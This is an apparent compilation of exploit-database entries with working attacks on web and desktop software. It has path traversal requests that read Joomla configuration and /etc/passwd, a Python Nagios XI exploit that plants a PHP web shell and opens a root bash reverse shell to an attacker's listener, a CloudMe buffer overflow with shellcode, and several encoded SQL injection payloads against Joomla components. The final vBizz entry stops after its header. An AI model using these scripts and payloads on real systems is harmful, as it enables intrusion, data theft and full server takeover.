# Vendor Homepage: https://joomtech.net/
# Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7bafaa65995fb3b1383328105df1e10f
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/shopping-cart/easy-shop/
# Version: 1.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME]
#
GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1
GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: __cfduid=d11dd4447c0b8ef3cd8c4f6745ebdf50e1548111108; 6eecafb7a7a944789bd299deac1ff945=osde04ob1pgq9o3p8arfqtbobk
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 21 Jan 2019 23:58:02 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="http://localhost/[PATH]/"
Server: cloudflare
CF-RAY: 49cd621bce8f537e-LAX
Content-Encoding: br
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
....
# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation
# Date: 2019-01-22
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.nagios.com/
# Product: Nagios XI
# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz
# Version: From 2012r1.0 to 5.5.6
# Tested on:
# - CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file
# - Nagios XI 2012r1.0, 5r1.0, and 5.5.6
# CVE: CVE-2018-15708, CVE-2018-15710
#
# See Also:
# https://www.tenable.com/security/research/tra-2018-37
# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell.
# You'll need your own Netcat listener
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # silence the warning that verify=False in http_get_quiet() would otherwise emit per request
TIMEOUT = 5 # sec; per-request timeout passed to requests.get()
def err_and_exit(msg):
    """Print `msg` as an ERROR banner on stdout and terminate with exit status 1."""
    print('\n\nERROR: ' + msg + '\n\n')
    raise SystemExit(1)
# handle sending a get request
def http_get_quiet(url):
    """GET `url` with the module TIMEOUT and return the requests.Response.

    Certificate validation is disabled (verify=False), presumably because the
    target's certificate is untrusted. A ReadTimeout ends the program through
    err_and_exit(); any other exception propagates unchanged.
    """
    try:
        return requests.get(url, timeout=TIMEOUT, verify=False)
    except requests.exceptions.ReadTimeout:
        err_and_exit("Request to '" + url + "' timed out.")
# 200?
def url_ok(url):
    """True when a GET of `url` answers HTTP 200; any other status is False."""
    response = http_get_quiet(url)
    is_ok = response.status_code == 200
    return is_ok
# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
    """GET `path?cmd=<cmd>` and return the Response.

    `path` is the full URL of the exec.php written by the listener (see
    MyHTTPD for its body). Each call shows up in the target's web access log
    as a request for exec.php with a cmd= query string.
    """
    querystr = { 'cmd' : cmd }
    # e.g. http://blah/exec.php?cmd=whoami
    url = path + '?' + urllib.urlencode(querystr) # Python 2 API (urllib.parse.urlencode on Python 3)
    return http_get_quiet(url)
# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
    """Remove each path in `paths`, remotely or locally.

    remote=True: runs `rm <path>` through exec.php, so exec_path must be set
    (the default None would raise TypeError inside send_shell_cmd when it is
    concatenated). remote=False: os.remove() on this host. Paths are inserted
    into the shell command unquoted; the callers are outside this excerpt.
    The "Removing ..." line is printed after the action, not before.
    """
    if remote:
        for path in paths:
            send_shell_cmd(exec_path, 'rm ' + path)
            print 'Removing remote file ' + path
    else:
        for path in paths:
            os.remove(path)
            print 'Removing local file ' + path
# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
    """Generate a SSL certificate.
    If the cert_path and the key_path are present they will be overwritten.

    Writes a PEM certificate and PEM private key under cert_dir and returns
    (cert_path, key_path). The key is RSA-1024 and the certificate is signed
    with SHA-1 — both well below current guidance, tolerable only because the
    certificate protects a throwaway listener for a single run.
    """
    if not os.path.exists(cert_dir):
        os.makedirs(cert_dir)
    cert_path = os.path.join(cert_dir, cert_file)
    key_path = os.path.join(cert_dir, key_file)
    # remove stale files first so output from an earlier run is never reused
    if os.path.exists(cert_path):
        os.unlink(cert_path)
    if os.path.exists(key_path):
        os.unlink(key_path)
    # create a key pair
    key = crypto.PKey()
    key.generate_key(crypto.TYPE_RSA, 1024)
    # create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().C = 'US'
    cert.get_subject().ST = 'Lorem'
    cert.get_subject().L = 'Ipsum'
    cert.get_subject().O = 'Lorem'
    cert.get_subject().OU = 'Ipsum'
    cert.get_subject().CN = 'Unknown'
    cert.set_serial_number(1000)
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60) # ~10 years
    cert.set_issuer(cert.get_subject()) # issuer == subject: self-signed
    cert.set_pubkey(key)
    cert.sign(key, 'sha1')
    # 'wt' (text) mode works on Python 2, where dump_* return str.
    # NOTE(review): on Python 3 pyOpenSSL's dump_* return bytes and these
    # writes would raise; the whole script is Python 2 (print statements,
    # BaseHTTPServer), so this is consistent with the rest.
    with open(cert_path, 'wt') as fd:
        fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
    # No chmod: the private key is created with the process umask, which on
    # most systems leaves it readable by other local users.
    with open(key_path, 'wt') as fd:
        fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
    return cert_path, key_path
# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
    """Minimal handler: every GET is answered 200 with a PHP one-liner body.

    That body is what the target is made to fetch and save as exec.php (see
    the '-o' argument injection in the main section); send_shell_cmd() then
    talks to that file. No path, method or client check is made — anything
    that can reach this listener receives the same response.
    """
    def do_GET(self):
        self.send_response(200)
        msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
        self.end_headers()
        self.wfile.write(str.encode(msg))
# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
    """TLS-wrapped TCPServer running MyHTTPD on a daemon thread.

    Order matters in __init__: TCPServer binds and listens in its constructor
    (bind_and_activate defaults to True), and only afterwards is the listening
    socket swapped for the ssl-wrapped one, so accepted connections are TLS.
    ssl.wrap_socket() is deprecated and was removed in Python 3.12;
    SSLContext.wrap_socket() is the replacement — left as is here.
    """
    def __init__(self, host, port, keyfile, certfile):
        self.server = SocketServer.TCPServer((host, port), MyHTTPD) # Python 2 module name
        self.server.socket = ssl.wrap_socket(
            self.server.socket,
            keyfile=keyfile,
            certfile=certfile,
            server_side=True
        )
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True # do not keep the process alive on exit
    def start(self):
        self.server_thread.start()
    def stop(self):
        self.server.shutdown() # stops serve_forever(); blocks until the loop has exited
        self.server.server_close()
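##### MAIN #####
desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()

# Nagios XI target settings
target = { 'ip' : args.t }

# listener settings: -ip/-port must be reachable from the Nagios XI host (it
# fetches exec.php from us); -ncip/-ncport is where the root shell calls back
listener = {
    'ip'    : args.ip,
    'port'  : args.port,
    'ncip'  : args.ncip,
    'ncport': args.ncport
}

# generate self-signed cert for the HTTPS listener
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)

# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])

exec_path = None      # URL of exec.php on the target, once it has been written
cleanup_paths = []    # paths on the Nagios XI filesystem to remove at the end

# everything from here on runs under try/finally so the listener, the local
# key material and any file dropped on the target are cleaned up even when a
# step bails out (err_and_exit, Ctrl-C, connection errors)
try:
    # path to Nagios XI app
    base_url = 'https://' + target['ip']

    # ensure magpie_debug.php exists
    magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
    if not url_ok(magpie_url):
        err_and_exit('magpie_debug.php not found.')
    print '\nFound magpie_debug.php.\n'

    # ( local fs path : url path )
    paths = [
        ( '/usr/local/nagvis/share/', '/nagvis' ),
        ( '/var/www/html/nagiosql/', '/nagiosql' )
    ]

    # inject argument to create exec.php
    # try multiple directories if necessary. dir will be different based on nagios xi version
    filename = 'exec.php'
    for path in paths:
        local_path = path[0] + filename   # on fs
        # argument injection: the '%20-o%20<path>' suffix is split off as a
        # separate '-o <path>' option by the fetcher (curl, judging by the
        # flag), so our listener's response body is written to that path
        url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path
        url = magpie_url + '?url=' + url
        print 'magpie url = ' + url
        http_get_quiet(url)

        # ensure php file was created
        exec_url = base_url + path[1] + '/' + filename   # e.g. https://192.168.1.192/nagiosql/exec.php
        if url_ok(exec_url):
            exec_path = exec_url
            cleanup_paths.append(local_path)
            break
        # otherwise, try the next path

    if exec_path is None:
        err_and_exit('Couldn\'t create PHP file.')
    print '\n' + filename + ' written. Visit ' + exec_path + '\n'

    # run a few commands to display status to user
    print 'Gathering some basic info...'
    cmds = [
        ('whoami', 'Current User'),
        ("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
    ]
    for cmd in cmds:
        r = send_shell_cmd(exec_path, cmd[0])
        sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)

    # candidates for privilege escalation
    # depends on Nagios XI version
    rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'

    # tuple contains (shell command, cleanup path)
    priv_esc_list = [
        ("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
        ("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
    ]

    # escalate privileges and launch the connect-back shell.
    # OPSEC note: each command, reverse-shell one-liner included, travels in
    # the GET query string of exec.php and will typically end up in the
    # target's web server access log.
    timed_out = False
    for priv_esc in priv_esc_list:
        url = exec_path + '?' + urllib.urlencode({ 'cmd' : priv_esc[0] })
        # announce before the request: on success it blocks until TIMEOUT
        # (the reverse shell keeps the PHP request open), so a print placed
        # after the call is never reached in the interesting case
        print '\nTrying to escalate privs with url: ' + url
        # the nmap candidate writes its .nse helper before sudo runs, i.e.
        # whether or not the escalation works, so schedule its removal either way
        if priv_esc[1] is not None:
            cleanup_paths.append(priv_esc[1])
        try:
            # verification off: the Nagios XI web UI typically serves a self-signed cert
            requests.get(url, timeout=TIMEOUT, verify=False)
        except requests.exceptions.ReadTimeout:
            # the request hanging is our (indirect) success signal
            timed_out = True
            break

    if timed_out:
        print 'Check for a shell!!\n'
    else:
        print 'Not so sure it worked...\n'
finally:
    # always tear down the listener and the local key material; remove the
    # files dropped on the target only if we got as far as writing exec.php
    server.stop()
    if exec_path is not None:
        clean_up(True, cleanup_paths, exec_path)   # remote files
    clean_up(False, [cert_file, key_file])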
# Exploit Title: Microsoft Windows 'VCF' or 'Contact' File URL Manipulation-Spoof Arbitrary Code Execution Vulnerability -- Remote Vector
# Google Dork: N/A
# Date: January, 21 2019
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: Windows 7 SP1, 8.1, 10 v.1809 with full patches up to January 2019; both x86 and x64 architectures.
# Tested on: Windows 7 SP1, 8.1, 10 v.1809 with full patches up to January 2019; both x86 and x64 architectures.
# CVE : n/a
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46220.zip
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author: T3jv1l
# Vendor Homepage: https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Local
# Contact: https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Based on the original exploit for version 1.11.0: https://www.exploit-db.com/exploits/44027
# Hello subinacls and NytroRST !
#############################################################
import socket
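# Egghunter that scans memory for the 4-byte tag "boom" repeated twice and
# then jumps to the bytes that follow it (the real shellcode in payload2).
egg = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a"
    b"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"   # "boom" tag lives in this row
    b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

target = "127.0.0.1"
port = 8888

# Layout of payload1 (saved EIP is overwritten at offset 1052):
#   [0, 1015)     "A" filler (0x41 = inc ecx, so it doubles as a NOP sled)
#   [1015, 1047)  egghunter (32 bytes)
#   [1047, 1052)  "B" padding
#   [1052, 1056)  return address 0x699937d9, the "push ret" gadget
#                 (presumably push esp ; ret, landing on the two bytes below)
#   [1056, 1058)  jmp short -60: relative to offset 1058 this lands at 998,
#                 inside the "A" sled, which runs forward into the egghunter
junk = b"A" * 1015
jmp = b"\xd9\x37\x99\x69"   # 0x699937d9 push ret
jump_back = b"\xeb\xc4"     # jmp short -60 bytes

# Shellcode calc.exe
buf = b""
buf += b"\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf += b"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf += b"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf += b"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf += b"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf += b"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf += b"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf += b"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf += b"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf += b"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf += b"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf += b"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf += b"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf += b"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf += b"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf += b"\xc4\xd9"

payload1 = junk + egg + b"B" * 5 + jmp + jump_back
# tag followed by the real shellcode; the egghunter locates this in memory
payload2 = b"boomboom" + buf


def send_payload(host, port, data):
    """Deliver the exploit buffer to CloudMe Sync listening on host:port.

    Raises socket.error on connection/transmission failure. The socket is
    always closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        # sendall, not send: send() may transmit only part of the buffer, and
        # a truncated payload never reaches the return address at offset 1052
        s.sendall(data)
    finally:
        s.close()


if __name__ == '__main__':
    try:
        send_payload(target, port, payload1 + payload2)
    except socket.error as e:
        # a reset from the crashing service is expected; anything else
        # (refused connection, wrong host) is worth seeing rather than hiding
        print("Don't Crash Me !")
        print("socket error: %s" % e)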
# Exploit Title: Joomla! Component vReview 1.9.11 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/
# Version: 1.9.11
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_vreview&task=editReview
#
POST /[PATH]/index.php?option=com_vreview&task=editReview HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d
# decoded: cmId=1 union select CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())-- -
HTTP/1.1 200 OK
Date: Tue, 22 Jan 2019 19:41:46 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# POC:
# 2)
# http://localhost/[PATH]/index.php?option=com_vreview&task=displayRecords
#
POST /[PATH]/index.php?option=com_vreview&task=displayReply HTTP/1.1
POST /[PATH]/index.php?option=com_vreview&task=displayRecords HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 424
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profileid=%39%39%39%39%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2d%2d%20%2d
# decoded: profileid=9999 UNION SELECT 1,2,3,...,42-- -  (42-column UNION; the 500 below is the column-count probe failing, not a successful dump)
HTTP/1.1 500....
Date: Tue, 22 Jan 2019 19:33:39 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# Exploit Title: Joomla! Component vWishlist 1.0.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/vwishlist/
# Version: 1.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC (the captured request carries joomla_user_state=logged_in and the response says X-Logged-In: True, so an authenticated session appears to be required):
# 1)
# http://localhost/[PATH]//
#
POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
# decoded: vproductid=48 AND EXTRACTVALUE(22,CONCAT(0x5c,version(),(SELECT (ELT(1=1,1))),database()))-- X  (error-based; the data comes back in the "XPATH syntax error" message)
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: True
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# POC:
# 2)
# http://localhost/[PATH]//
#
POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48
# decoded: userid=711 AND EXTRACTVALUE(22,CONCAT(0x5c,version(),(SELECT (ELT(1=1,1))),database()))-- X
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: True
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC (the captured request carries joomla_user_state=logged_in, so an authenticated session appears to be required):
# 1)
# http://localhost/[PATH]/index.php
#
POST /[PATH]/index.php? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 726
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profile_pic=&name=test&username=test&password=&user_role=11&email=test@test.test&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7&amount[]=0.00&payid[]=8&amount[]=0.00&payid[]=9%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&lastIncrement=7&option=com_vbizz&id=60&userid=60&task=apply&view=employee
# decoded: payid[]=9  AND EXTRACTVALUE(22,CONCAT(0x5c,version(),(SELECT (ELT(1=1,1))),database()))-- X  (injection point is the last payid[] array element)
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4278
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:10:53 GMT
X-Varnish: 561075451
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
# Exploit Title: Joomla! Component vBizz 1.0.7 - Remote Code Execution
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC (the captured request carries joomla_user_state=logged_in, so an authenticated account appears to be required):
# 1)
# http://localhost/[PATH]/index.php?option=com_vbizz&view=employee
# The profile_pic upload is saved under /components/com_vbizz/uploads/profile_pics/ as
# <upload unix epoch><original filename>: 1548192100phpinfo.php below corresponds to
# 2019-01-22 21:21:40 UTC, which matches the Last-Modified/Date headers of the 303
# response, so the path of the dropped PHP file can be derived from the response headers.
#
